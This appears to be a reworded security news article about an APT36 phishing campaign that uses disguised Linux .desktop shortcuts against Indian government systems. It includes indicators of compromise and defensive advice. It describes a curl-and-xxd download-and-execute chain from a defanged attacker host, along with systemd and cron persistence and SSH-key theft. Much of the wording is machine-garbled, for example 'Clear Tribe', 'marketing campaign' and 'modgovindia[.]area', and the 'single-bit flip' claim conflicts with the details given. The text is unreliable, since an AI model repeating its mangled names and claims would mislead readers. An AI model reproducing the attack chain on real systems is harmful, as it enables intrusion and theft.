CYFIRMA researchers have uncovered a marketing campaign they’ve codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file could be sufficient to re-pivot a neural-network-driven safety workflow and open a backdoor on the underlying host.
Clear Tribe (APT36) is leveraging the trick towards India’s Authorities networks that depend on the indigenous BOSS GNU/Linux distribution, whereas persevering with to run a parallel Home windows lure for mixed-fleet environments.
The group’s lure, first seen on 1 August 2025, arrives by spear-phishing e mail because the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.
Inside sits a shortcut known as “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME kind and filename persuade most customers and, crucially, many machine-learning-based mail gateways that it’s only a PDF hyperlink.
APT36 weaponises Linux “.desktop” shortcuts
The novelty sits within the Exec= line. By toggling a single hexadecimal character, the attackers substitute the reputable viewer name with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it by means of xxd to rebuild uncooked ELF, drops it in /tmp with a timestamped title, marks it executable and launches it below nohup.
Firefox is then opened on an innocuous Google Drive PDF to finish the phantasm of normality.
As a result of the file is asserted Kind=Utility and Terminal=false, no console seems, whereas X-GNOME-Autostart-enabled=true ensures the shortcut fires on each log-in, flipping a single persistence bit contained in the person’s session metadata.
Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped part names, outsized NOBITS areas and a hard-coded string for hxxp://modgovindia[.]area:4000.
Runtime evaluation confirms that the implant registers a per-user systemd timer named system-update.service and duplicates itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.
Stealth persistence established
Socket traces present non-blocking DNS queries through 127.0.0.53 that resolve modgovindia[.]area to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and knowledge exfiltration.
The implant has already been caught siphoning listing listings, native person databases and SSH keys, indicating the adversary is staging wider lateral motion.
The OneFlip moniker displays the marketing campaign’s potential to defeat automated inspection pipelines that now rely closely on deep-learning classifiers.
By embedding its malicious logic within the unstructured Exec string and altering solely a single byte relative to a reputable template, the shortcut retains a near-identical characteristic vector; the neural web continues to attain it as benign, whereas human operators see solely a PDF icon.
This underscores a broader weak point in AI-assisted filtering: fashions that aren’t retrained on Linux-specific menace artefacts are blind to delicate, syntax-level perturbations.
Defenders ought to harden BOSS hosts with noexec mounts on /tmp, block outbound entry to newly registered domains, and deploy an EDR that inspects .desktop recordsdata for compound shell directives.
Mail methods should detonate Linux shortcuts in sandboxed VMs as a result of signature-less, single-bit polymorphism is now a confirmed bypass approach.
Lastly, safety groups working machine-learning detection stacks ought to develop coaching units to incorporate Linux UI artefacts and take a look at adversarial robustness towards command-concatenation patterns.
CYFIRMA assesses that APT36 will proceed enriching its backdoor till host-based fashions study to identify these minimal flips; till then, the group retains a stealthy, dual-platform foothold inside important Indian Authorities infrastructure.
Indicators of Compromise
| S.No | Indicator | Kind / Motion |
|---|---|---|
| 1 | 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1 | SHA-256 / Block |
| 2 | 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 | SHA-256 / Block |
| 3 | e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b | SHA-256 / Block |
| 4 | securestore[.]cv | Area / Block |
| 5 | modgovindia[.]area | Area / Block |
| 6 | 45[.]141[.]58[.]199 | IP / Monitor |
Discover this Information Fascinating! Comply with us on Google Information, LinkedIn, and X to Get On the spot Updates!
